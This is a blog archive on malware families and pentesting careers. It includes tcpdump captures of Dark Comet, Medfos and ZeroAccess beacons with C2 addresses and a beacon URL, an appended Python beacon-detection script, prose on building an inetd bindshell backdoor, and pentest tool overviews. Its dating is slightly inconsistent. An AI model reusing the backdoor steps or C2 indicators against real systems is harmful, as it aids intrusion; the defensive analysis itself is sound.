Monthly Archives: November 2015

What is Malware? What are some Malware Families and Variants?

Kinda ironic, I like to ask candidates while I am doing a job interview “What is Malware?” and what is it an amalgamation of?

I get responses like “It is a type of virus that gets on your computer” or “It is a backdoor that a hacker installs”

Even funnier is that about half of these educated and certification heavy professionals don’t know that malware is the combination of “Malicious” and “Software”

The interview for them is just about over at this point….

Anyway, here is a brief run down of how malware finds its way onto hosts, some malware families and specific brands and variants within the families.

 

Malware vs Exploit Kits

This is something that should not have to be explained to a cyber security professional, yet I keep having to do it.

Exploit kits are not malware! You cannot get infected with an exploit kit! Maybe 5% of the professionals I interview understand that concept – keep in mind these are people with years of “experience” expecting six figure jobs.

A web-based exploit kit is hosted on a web server, either on malicious infrastructure or on a hacked website. A common means of deploying exploit kit redirects is to hack a forum or WordPress/Joomla site with out-of-date plugins, which allows an attacker to inject code via XSS or SQLi and from there insert a malicious iframe redirect.

The initial redirect is made up of simple HTML, JavaScript, PHP, etc., which is known as a landing page. It is basically like visiting your favorite site blah.com, which is really blah.com/index.html or blah.com/index.php, but you get the point.

There are many different exploit kits in the wild; the most prevalent for 2016 are Angler Exploit Kit, Nuclear Exploit, RIG and Neutrino, with some other stragglers out there. Their methodology is the same; the differences are in how the exploit kit operates and what the exploit kit is packing. Some exploit kits pack exploits for various Java, Flash, PDF, Silverlight and Internet Explorer vulnerabilities. Some exploit kits make a GET request for each of those plugins to determine which version of the software is on your machine. If a kit runs through all of its checks and has no exploit for the plugin versions it found, it will quit without even attempting exploitation, to keep security analysts from analyzing the kit. Other exploit kits target one type of vulnerability; for instance, Angler Exploit Kit targeted just the latest Flash vulnerabilities for most of 2015.

Exploit kits are sneaky. Typically a valid referrer is required in the HTTP header for the exploit kit to begin its process, once again to prevent security analysts from getting a free look at the payload from the comfort and safety of a virtual machine. Once a vulnerable plugin is detected, the exploit kit will send one or more obfuscated exploits to the victim in a GET request. If the exploit is successful, the exploit kit will typically make the victim download a malicious payload (the malware). If the exploit is not successful, the kit will typically give up and the process is over. HOWEVER, there is the off chance that the exploit kit will rely on social engineering and prompt the potential victim with a download request in the form of a simple pop-up window; if the file is downloaded and run it has the same effect, and the potential victim is now a victim. Social engineering from the exploit kit is rarely seen. I have observed it several times when an exploit kit was trying to exploit a patched plugin and had no chance of success, but having already redirected a user to the kit, it made a last-ditch effort by feeding them a drive-by download, if you will.

 

Brief Overview of Malware Families

Malware families are specific types of malware that share a common set of behaviors once they infect a host.

Ransomware Family – You may have heard of this type of malware in the news lately; the Angler Exploit Kit has delivered several different types of ransomware to its victims over the last year. Ransomware is a type of malware that, once on a host, will typically encrypt the contents of the user’s hard drive (some offspring only bluff at this) and hold the user’s data literally for ransom. Ransomware became prevalent in 2012; one of the first variants, known as Reveton, fraudulently claimed that the user must pay a fine to the Metropolitan Police Service.

Since Reveton there have been loads of variants popping up with evolved encryption techniques and various means of accepting payment to release the victim’s data. Some popular flavors of ransomware include TeslaCrypt, AlphaCrypt, CryptoWall and CryptoLocker.

Click Fraud & Click Hijacking Family – For most of 2015 the Click Fraud family has been the most prevalent and successful, while Click Jacking has diminished a bit. Click jacking is the process of letting a victim type a search query into the search bar or their favorite search engine and stealing the keywords used for the search to redirect the victim to a custom search page with which the hostile actors have an account, so they get paid when the victim clicks links from the search. Most click fraud malware will hijack the victim’s browser start page, replacing it with one that pays them when the user clicks links within it, and will also open pop-up windows, pop-under windows and customized search pages. In its infancy click jacking mainly targeted Google AdSense; it would use the victim’s search query as a crafted referrer to automatically click links after the search. Google is very smart and soon caught on to this scheme and behavior, but not before millions of dollars were collected by hostile crimeware families.

A few examples of popular malware botnets performing these actions are Zero Access (one of its plugins), TDSS and Bedep.

 

Pay-Per-Install / Pay-Per-Action / Adware Families – Some types of malware are very hard to isolate and separate from typical adware and toolbars that are usually more of a nuisance than anything else.

Two popular types of this malware are Mevade and Asprox/Kuluoz. Mevade has very little communication with its command and control server; once installed on a victim host it acts more as adware than malware. Mevade downloads and installs shady PC optimizer software and other software for which it earns anywhere from $1 to $5 per install. Mevade sprang up in early 2014 and hit with fury, infecting several hundred thousand hosts through spam e-mail campaigns, and within a few months its operators vanished with their small and quick fortune, estimated to be just under one million dollars.

Another popular one is Kuluoz/Asprox, which issues commands that instruct compromised computers to download and execute additional payloads provided by a pay-per-install (PPI) affiliate, from which the botnet operators earn revenue. Unlike Mevade, the crimeware bosses behind it were very greedy. They delivered their malware through spam e-mails, typically using subject lines like “Your Fedex tracking information” or “UPS Shipment Information”, which surprisingly had a very high infection rate. Kuluoz had a very nice run: its operators started in 2013 and kept pushing their malware until early 2015, when the FBI finally got their claws on them with assistance from international agencies. The group has been reported to have made in excess of $100,000 over their duration.

 

Bitcoin/Crypto-currency Mining – With Bitcoin, miners use special software to solve math problems and are issued a certain number of bitcoins in exchange. This provides a smart way to issue the currency and also creates an incentive for more people to mine. Mining is the process of adding transaction records to Bitcoin’s public ledger of past transactions. This ledger of past transactions is called the block chain as it is a chain of blocks. The block chain serves to confirm transactions to the rest of the network as having taken place. Bitcoin nodes use the block chain to distinguish legitimate Bitcoin transactions from attempts to re-spend coins that have already been spent elsewhere.

Malware writers realized that it was easier to create a botnet of compromised hosts and use their GPUs to perform bitcoin mining instead of investing money in infrastructure to do it themselves. In the early years of bitcoin mining it was a lot easier to earn coins, but the market became saturated and more and more resources were required to generate substantial revenue.

One of the most prevalent and successful malware families to employ bitcoin mining as its primary source of income was the Zero Access / Sirefef botnet, which used a peer-to-peer network built on a list of 128 hardcoded IPs of other infected systems, with a master node hidden within the list that fed to a supernode, making it very hard to track down the criminals behind this enterprise. After a few years of tremendous success, law enforcement was able to shut down the botnet and make several arrests. All told, the Zero Access masterminds reportedly generated over $100,000,000 in revenue!

 

Banking Trojans – Banking trojans are timeless and we may never truly put an end to them, as they are big money and hard to trace. Once a victim is infected, a banking trojan installs a keylogger that sits and waits for the victim to browse to one of the banks on the prepopulated list the malware tracks. An unsuspecting user will log in to their bank account over port 443 using SSL, thinking that their login and password are secured by encryption. They are correct in assuming that nobody will be able to sniff their password crossing the wire; however, keyloggers are not concerned with defeating encryption. The keylogger, or keystroke logger, captures every key the user presses on the keyboard, which includes the victim typing in the web address of their bank followed by their login name and password. Basically, it is game over for the victim; their only chance is to immediately remove the malware and change their passwords. The crimeware group will use the banking information to log in to the victim’s bank account and use bank-to-bank transfers, Western Union, cashier’s checks and other means to initially withdraw sums of cash from the victim’s bank account. After they have pulled the money into a shell account, they typically spread it around and launder it, so that by the time the crimeware group goes to withdraw it the money has passed through so many intermediaries that it is essentially untraceable.

Banking trojans are known to be region specific, meaning that they might only target victims that live in Mexico where they know they can easily withdraw the money because they have people on the ground there acting as mules. Banking trojans have also been observed transferring money into bitcoins making them virtually untraceable as well.

There have been so many variants. ZeuS/Zbot/Gameover ZeuS was one of the first big-time banking trojans to hit the world, and it hit the world hard; over time some have considered these to be the most successful and profitable malware campaigns of all time, raking in a reported $500,000,000 between the various variants. The source code for this malware was leaked and a multitude of ZeuS variants have sporadically popped up all over the world. Other big-time banking trojans include Oddjob, SpyEye, Geodo ebanking Trojan, Dyreza, Dridex, Dyre and Emotet.

Currently, the most active threats are VawTrak, Dridex and Dyre. They use specially crafted self-signed SSL certificates, making their communication difficult to decipher. Dridex uses a different self-signed certificate in each campaign, making it virtually impossible to write Snort rules for.

 

Trojan Downloaders – This should be axiomatic looking at the name. Trojan downloaders are small pieces of malware that hostile actors like to install once they have compromised a victim, because they can be easily rewritten to avoid detection; since their size is small and their installation requirements are virtually none, they sneak onto systems at a higher rate than the average malware. The purpose of trojan downloaders is to load other malware and malicious software. One of the most prolific is the Pony Trojan Downloader; its detection ratio is always very low as the writers are always tweaking the code, and it has survived for years.

 

FakeAV – Once the most common form of malware, FakeAV may hold the lead for revenue generated as a family, as this type of threat has been around since the 2000’s and continues to this day. FakeAV is extremely hard to remove from an infected system as it embeds itself virtually everywhere it can; once again we recommend that you re-image any machine with FakeAV installed on it. After infection a victim may see what look like legitimate Windows Defender pop-ups from the task bar, and virtually any webpage the victim tries to visit is redirected to a flashing page warning the user that they have been infected with a very serious virus and need to remove it immediately before it’s too late. I have heard it compared to ransomware and they do have some similarities: FakeAV wants you to purchase their anti-virus solution to remove the malware that it in fact installed on your system. If you pay for their software it may remove the threat; realistically it depends on the flavor of FakeAV that you have been infected with.

 

Internet Relay Chat (IRC) Botnets – This type of malware has become more of a thing of the past, with the exception of hacked *nix and MacOS systems. An infected machine will connect to an IRC server that has been preloaded in the malware and join a specific channel that usually hosts the botnet controller’s group of compromised victims. The connection to IRC happens in the background, all without the victim knowing they are in a chat room. Typically the IRC channel that the bot joins requires a password to get in, or the bot master has created his own IRC server to host the botnet, from which he can ACL out anyone who isn’t a bot or him. Once the victim is in the channel just about anything is possible: the botmaster can issue commands to download tools, malware or whatever is desired. The botmaster can use the bots in DDoS attacks or load them up with bitcoin mining software; they are really at his disposal.

SDBot has been around since the mid 1990’s and it still exists today as the most common IRC backdoor trojan; the code is very simple and can be easily modified to bypass anti-virus solutions. Typically IRC botnets are only used for the most prized possessions of a botnet, which are Linux/Solaris/BSD and other *nix based servers, and are usually used to DDoS members on IRC that the group has made enemies with, or for sport.

 

DDoS Botnets – The name says it all: these are malware botnets just like the rest of the ones discussed, with the difference being that the primary focus of these botnets is Distributed Denial of Service (DDoS) attacks. Just like most of the monetary mechanisms used by botnet owners above, DDoS has become big business on the underground as well. You can visit a site like hackforums.net and there will be hundreds of ads posted for “stressers” and DDoS botnet leasing services. For as little as $5 you can take down a corporate network for an hour. The DDoS malware typically contains a UDP flooder, TCP reset flooder (stream), ICMP attacks, IGMP and various other protocols; it can also initiate Distributed Reflection Denial of Service (DrDoS) attacks to mask the botnet owner’s identity.

There have been countless DDoS botnets since 1995, the originals being Tribe Flood Network, Stacheldraht, MStream and Trinoo. These botnets were not automated like the ones of today; in the old days you would hack a *nix server, install the client side of the DDoS software on the host and control it with a master server. These were some of the most powerful botnets ever built; hacker groups would pool their shells and roots into one big collection and load them up for attack. These were not Windows boxes on slow cable modems but instead high performance computing at places like HUT.FI and TUT.FI, bringing the fastest connections and uplinks in the world together to knock any site, company or even country offline with OC248 power vs T3 if you were lucky.

DDoS botnets that are still active include Dorkbot, YZF and Ferret, and currently the most dangerous is the XOR Linux Botnet, capable of delivering over 200+ GB/s of bandwidth.

 

Remote Access Trojans (RAT) – When used for administration of legit services it is usually referred to as a Remote Administration Tool; when used by hostile actors this type of malware is usually associated with APT threats and state-sponsored activity. A RAT gives the hostile actor a means to access the compromised host or server even if it is protected by layers of security and defense in depth. Originally they used what is known as a bindshell, which is when a command line shell is bound to a specific port. For instance, I edit /etc/services and /etc/inetd.conf, make a rootshell on port 4444 and call it test server in inetd and services; once I restart inetd I can remote into the machine by telnetting to port 4444, or ssh in later iterations. Rarely were there firewalls in place to block this type of incoming traffic; the servers that had firewalls usually had host-based ones, and you could simply modify ipchains/iptables to open the port of your choosing, allowing access.

Modern RATs use what is known as a reverse shell to spawn a connection, which means that the initial SYN packet comes from the compromised host within the protected network and would not typically be blocked. The hostile actor runs software such as netcat to listen for the incoming connection and spawn a shell on connect. RATs do not all work the same way: some use ICMP or IGMP knock-back packets which look harmless but trigger the reverse shell connection, others create subdomains within the network if they can compromise the domain controllers, and other types use the RAT software itself to interact with the compromised host. I have even seen RAT software install other remote administration tools such as TeamViewer, which would give the hostile actors GUI access to a compromised Windows machine.

Some examples of RATs include Rammit, GhostNet and Palevo

 

FTP botnets – Formerly a popular choice for malware writers but has since lost a lot of traction, mainly because FTP is usually a more restricted protocol these days. FTP malware would search an infected host for password files, financial information, text documents, tax information, banking information, stored credit cards and other personally identifiable information or data of value for the hostile actors to resell on the black market or use for profit.

Some recent examples of these botnets are Reedum Point of Sale Infostealer, USteal and Ghost RAT variants

 

Spam Botnets – These botnets usually do not stand on their own; typically they are rolled into one of the above malware families as an extension or module. Spam botnets work by extracting all e-mail addresses on a compromised host from Outlook databases and other e-mail client software user lists. The malware uses the infected server or host’s ability to send mail and starts spamming the client lists with links to the same malware or other malware, and also spams links to generate revenue from ad clicking. It takes advantage of people’s trust in e-mail from friends who would be in the contact list, which makes it very successful.

A few SPAM centric botnets active today are Chanitor and Sanny Daws

 

Possibly Unwanted Programs (PUPs) / Riskware – Basically everything discussed thus far falls into the category of “Malware”, but there is another type of software commonly referred to as a “PUP”, which basically means there is not enough information at this time to classify the software as malicious or innocuous. Usually more research and reverse engineering of the software is needed to determine its intentions. PUPs can go either way: they can turn out to be malware, legit software or adware, or even something else mistakenly classified here. Detection of a PUP usually relies on anomaly-based detection. APT malware would be a good candidate to show up as a PUP, as the purpose of an APT is to stay as low key as possible; Anti-Virus would therefore never have seen it before, but might be able to question the software’s intent, depending on the quality of the vendor.

You have Malware on your computer, yes YOU, bet me!

Throughout my years in the Cyber Security industry I have always found it odd that most security professionals seem to have very little grasp of the types of malware found in the wild, how they work and how people get infected with malware.

A friend of mine who has been in the IT system admin world for the last ten years told me the other day that he has never installed any type of Anti-Virus on his system because he has a firewall up and he never visits any sites that would get him infected, a few other admin friends chimed in echoing his sentiments. As a Cyber Security Specialist I wanted to fall on the ground laughing. I asked him how long he had been using his Windows Vista machine for (Vista…*sigh* …when everyone is on Windows 10 by now) and he said for over 7 years. My first response, while laughing was…WHY??? and the response was that he had never had a reason to upgrade and he didn’t trust anything else yet…keep in mind it is 2016 here!

To make things interesting I pulled out a hundred dollar bill and bet him that I could find two different families of malware on his PC and I will give him two to one odds AND I will identify which types of malware are present without installing any type of Anti-Virus software on his computer. The arrogance in him was showing and sure enough we had a bet.

I told him to make sure all his programs and any other computers on the network were turned off. A few minutes later I configured his switch to send traffic to the spanning port which I was plugging into ready to sniff on.

So I began a dump…..after the first couple minutes of dumping:

2015-11-27 22:31:03.730224 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Wd@…W….e…….i
.u………v……………
2015-11-27 22:31:09.733831 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Wl@…W….e…….i
.u…..p……………
2015-11-27 22:31:23.725572 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-11-27 22:31:26.725388 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-11-27 22:31:32.725971 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0W.@…W….e…….i.#hm….p……………
2015-11-27 22:31:46.729820 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…W!…e…….i………….E…………..
2015-11-27 22:31:49.729546 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X”@…W….e…….i………….E…………..
2015-11-27 22:31:55.730140 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0X?@…V….e…….i……..p…0N……….
2015-11-27 22:32:09.736312 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X_@…V….e…….i.#……….o……………
2015-11-27 22:32:12.727663 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Xc@…V….e…….i.#……….o……………
2015-11-27 22:32:18.729255 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Xv@…V….e…….i.#……p……………
2015-11-27 22:32:32.731983 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-11-27 22:32:35.731848 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-11-27 22:32:41.735398 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0[%@…T….e…….iu.WE….p…=………..
2015-11-27 22:32:55.736266 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QQ…e…….i.

 

One down…..this would be our old friend the Dark Comet RAT

https://malwr.com/analysis/YzAyY2IyMzZmMWE4NDA1NmFjZTRjMDdkNzMwYTllMGE/#network_hosts_tab

http://www.malwaretraffic.com/malware-network-traffic-pcap-samples/is-the-darkcomet-rat-group-even-around/

 

Within minutes after creating a BPF filter to clear out some noise I find an old OLD friend…..Medfos …

 

2015-11-27 22:35:02.091464 IP 192.168.1.101.57881 > 78.140.131.158.80: P 1896497444:1896497760(316) ack 1193820996 win 16425
E..d3.@.|..`..`.N……Pq
A$G(CDP.@)+~..GET /upload/fid=BwCbAAEAKsbVAgEGCAAAAAAAAAAAAAAAAAAAAAAYDQMVCwAAAPpy0x3iEW6SrLh0giZvmW85e0tRAAADsw-FBh4b__zvYZLojGKKVyfOAXf5SvUqxtUCeTc2PDw9fVdWUUZUQ1dbOTg-OALOkSInrtZWJwAgAAAAAQcAAAAHAAAANFYA HTTP/1.1
Host: megaupload[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cache-Control: no-cache

 

Really? Make it easier please. Within a few more minutes – Malware from years ago – Medfos – *sigh* …pay me now?  Or do we check UDP traffic…maybe he has had enough…

References:
http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2FMedfos&NavToggle=True#tab=2
https://www.virustotal.com/en/file/59afa68d4ec0392eea49eea70acb2e4c066656591835074c9b11cb52be5904ec/analysis/

 

Tcpdump for UDP traffic….

2015-11-27 22:37:32.041641 IP 192.168.1.101.1059 > 180.254.253.254.16464: UDP, length 16
E..,.Q….{d
……..#@P..w..s..(…….A.|p..
2015-11-27 22:37:34.482056 IP 192.168.1.101.1059 > 135.254.253.254.16464: UDP, length 16
E..,.R…..c
……..#@P…..s..(…….A.|p..
2015-11-27 22:37:37.691018 IP 192.168.1.101.1059 > 115.254.253.254.16464: UDP, length 16
E..,.S…..b
…s….#@P…..s..(…….A.|p..
2015-11-27 22:37:38.689153 IP 192.168.1.101.1059 > 88.254.253.254.16464: UDP, length 16
E..,.T…..a
…X….#@P…..s..(…….A.|p..
2015-11-27 22:37:41.122077 IP 192.168.1.101.1059 > 87.254.253.254.16464: UDP, length 16
E..,.U…..`
…W….#@P…..s..(…….A.|p..
2015-11-27 22:37:42.434002 IP 192.168.1.101.1059 > 71.254.253.254.16464: UDP, length 16
E..,.V….._
…G….#@P…..s..(…….A.|p..
2015-11-27 22:37:47.302714 IP 192.168.1.101.1059 > 213.253.253.254.16464: UDP, length 16
E..,.W….Z_
……..#@P..V..s..(…….A.|p..
2015-11-27 22:37:48.302716 IP 192.168.1.101.1059 > 212.253.253.254.16464: UDP, length 16
E..,.X….[^
……..#@P..W..s..(…….A.|p..
2015-11-27 22:37:49.302683 IP 192.168.1.101.1059 > 201.253.253.254.16464: UDP, length 16
E..,.Y….f]
……..#@P..b..s..(…….A.|p..
2015-11-27 22:37:50.302728 IP 192.168.1.101.1059 > 190.253.253.254.16464: UDP, length 16
E..,.Z….q\
……..#@P..m..s..(…….A.|p..
2015-11-27 22:37:51.302739 IP 192.168.1.101.1059 > 184.253.253.254.16464: UDP, length 16
E..,.[….w[
……..#@P..s..s..(…….A.|p..
2015-11-27 22:37:52.302687 IP 192.168.1.101.1059 > 180.253.253.254.16464: UDP, length 16
E..,.\….{Z
……..#@P..w..s..(…….A.|p..
2015-11-27 22:37:53.302694 IP 192.168.1.101.1059 > 67.81.86.2.16464: UDP, length 16
E..,.]……
…CQV..#@P…..s..(…….A.|p..

 

The ever obvious and, at this point, vintage malware: Zero Access, which beacons over UDP port 16464 (and others) with a packet length of 16!

References…like we need any:

https://malwr.com/analysis/ZjU2NjBhNWZkNTUyNGU1Mjg1ZTRiYTVhZDFmOWI5ZjE/#network_hosts_tab

http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html

https://www.virustotal.com/en/file/39f6b8a8e0c6925a2ce10fa36c9ce4e4689855381c8a331d489a0f0e3f38eb47/analysis/#behavioural-info
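The two network patterns picked out by eye in the captures above (the same SYN re-sent to one unanswered endpoint, and fixed-size UDP datagrams sprayed at many peers on one port) can be checked mechanically. The Python below is an added example, not code from the original post: it parses tcpdump text output in the format shown above and reports both patterns; the thresholds are assumptions, and the sample lines are constructed using documentation address ranges rather than the hosts from the capture.

```python
import re
from collections import defaultdict

# Matches the header line tcpdump prints per packet; the payload dump
# lines that follow each header do not match and are skipped.
HEADER = re.compile(
    r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+ IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): (?P<rest>.*)$"
)
SYN = re.compile(r"^Flags \[S\], seq (?P<seq>\d+),")
UDP = re.compile(r"^UDP, length (?P<length>\d+)$")


def parse_packets(text):
    """Return dicts for the bare SYN and undecoded UDP packets in tcpdump text."""
    packets = []
    for line in text.splitlines():
        m = HEADER.match(line.strip())
        if not m:
            continue
        pkt = {"src": m["src"], "dst": m["dst"], "dport": int(m["dport"])}
        syn, udp = SYN.match(m["rest"]), UDP.match(m["rest"])
        if syn:
            pkt.update(kind="syn", seq=int(syn["seq"]))
        elif udp:
            pkt.update(kind="udp", length=int(udp["length"]))
        else:
            continue
        packets.append(pkt)
    return packets


def find_syn_beacons(packets, min_sends=3, min_attempts=2):
    """Flag endpoints where several connection attempts each had the same SYN
    (same sequence number) sent min_sends times, i.e. nothing ever answered."""
    flows = defaultdict(lambda: defaultdict(int))
    for p in packets:
        if p["kind"] == "syn":
            flows[(p["src"], p["dst"], p["dport"])][p["seq"]] += 1
    hits = []
    for (src, dst, dport), seqs in flows.items():
        dead = [seq for seq, count in seqs.items() if count >= min_sends]
        if len(dead) >= min_attempts:
            hits.append({"src": src, "dst": dst, "dport": dport, "attempts": len(dead)})
    return hits


def find_udp_fanout(packets, min_peers=5):
    """Flag a host sending same-length UDP datagrams to many peers on one port."""
    groups = defaultdict(set)
    for p in packets:
        if p["kind"] == "udp":
            groups[(p["src"], p["dport"], p["length"])].add(p["dst"])
    return [
        {"src": src, "dport": dport, "length": length, "peers": len(dsts)}
        for (src, dport, length), dsts in groups.items()
        if len(dsts) >= min_peers
    ]


# Constructed sample in the same text format as the captures above.
SAMPLE = """\
2015-11-27 22:31:03.730224 IP 192.168.1.101.41347 > 198.51.100.7.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Wd@...W....e.......i
2015-11-27 22:31:06.730101 IP 192.168.1.101.41347 > 198.51.100.7.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2015-11-27 22:31:12.733831 IP 192.168.1.101.41347 > 198.51.100.7.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2015-11-27 22:31:23.725572 IP 192.168.1.101.41348 > 198.51.100.7.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2015-11-27 22:31:26.725388 IP 192.168.1.101.41348 > 198.51.100.7.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2015-11-27 22:31:32.725971 IP 192.168.1.101.41348 > 198.51.100.7.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2015-11-27 22:31:40.100000 IP 192.168.1.101.41350 > 203.0.113.10.443: Flags [S], seq 77001, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2015-11-27 22:37:32.041641 IP 192.168.1.101.1059 > 192.0.2.11.16464: UDP, length 16
2015-11-27 22:37:34.482056 IP 192.168.1.101.1059 > 192.0.2.12.16464: UDP, length 16
2015-11-27 22:37:37.691018 IP 192.168.1.101.1059 > 198.51.100.21.16464: UDP, length 16
2015-11-27 22:37:38.689153 IP 192.168.1.101.1059 > 198.51.100.22.16464: UDP, length 16
2015-11-27 22:37:41.122077 IP 192.168.1.101.1059 > 203.0.113.31.16464: UDP, length 16
2015-11-27 22:37:42.434002 IP 192.168.1.101.1059 > 203.0.113.32.16464: UDP, length 16
2015-11-27 22:37:45.000000 IP 192.168.1.101.5000 > 192.0.2.9.5000: UDP, length 120
"""

if __name__ == "__main__":
    pkts = parse_packets(SAMPLE)
    for hit in find_syn_beacons(pkts):
        print("unanswered SYN beacon:", hit)
    for hit in find_udp_fanout(pkts):
        print("fixed-size UDP fan-out:", hit)
```

Neither pattern names a malware family by itself; they surface the flows worth comparing against published traffic samples like the references above.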

 

 

How much malware is on your PC? The real lesson here is that EVERYONE needs to have a reliable anti-virus solution in place. It doesn’t matter if you don’t look at porn or download illegal bittorrents; malware is delivered through Exploit Kits….E-mail and a myriad of different ways. You could be browsing your favorite car forum, a hacker injects a malicious <iframe> through an XSS vulnerability and guess what….you’re owned.

Anti-Virus alone will not save you. The malware I deal with in the real world is found on enterprise systems with the latest dat files and signatures for AV; the crimeware writers change small things within their malware payload daily to defeat Anti-Virus. But if you’re getting the latest updates as they come out, sooner or later the malware will be detected, even by the AV stragglers out there.

If malware is detected on your machine, the safest bet is to just re-image the computer and get back on with your life; the malware detected could have already loaded additional malware your AV doesn’t detect. You could also be the victim of an APT, and if that is the case you better use those ninja skills to identify it through network traffic, as AV will most likely be years away from detecting it….if at all.

 

 


So you want a job as a penetration tester or web application tester?

Website Application Testing

In today’s world there are typically two main types of offensive security professionals. The first is website application testers, who focus primarily on weaknesses in web server applications such as cross-site scripting (XSS), SQL injection (SQLi) attacks, directory traversal attacks, directory brute forcing, unlinked content manipulation, authentication bypassing, brute forcing weak passwords and default passwords and configurations, cross-site request forgery, HTTP injection and replay attacks.

Pursuing a career in this field will require you to master some great tools available to you. The first one is known as Burp Suite by PortSwigger. There is a free and a paid version.

Burp Suite: Free version available for download at portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Sqlmap – Free download at sqlmap.org

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Havij – Free download at http://itsecteam.com/

Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. With this software a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system. What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij. The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.

Havij has an easy-to-use GUI which can be used to hack into a site in a matter of seconds. Havij is seen as a script kiddie tool, because the user does not have to follow the regular steps of SQL injection. It is still, however, a useful tool that many hackers keep in their arsenal for quick attacks.

Nikto – Free download at https://github.com/sullo/nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

 

 


 

Penetration Testing

True pen testing involves actually trying to exploit weaknesses and vulnerabilities in servers, networking infrastructure and workstations. Therefore, fewer companies and organizations actually employ these types of teams, because attempting to exploit a server may result in the server crashing and having an operational impact on the business or organization.

If you look up job offerings for penetration testing you will typically see that they are offered on a contract basis, usually 6 – 12 months, during which you will be doing an assessment on a network; when finished you will move on to your next project.

I have spent many years on the penetration testing side, myself and one or two other friends would take on a contract charging about $250-$300 an hour. The contract would include the testing of all public facing assets and internal assets of the company/organization. The test was not limited to just information system testing but also the exploitation of people through social engineering.

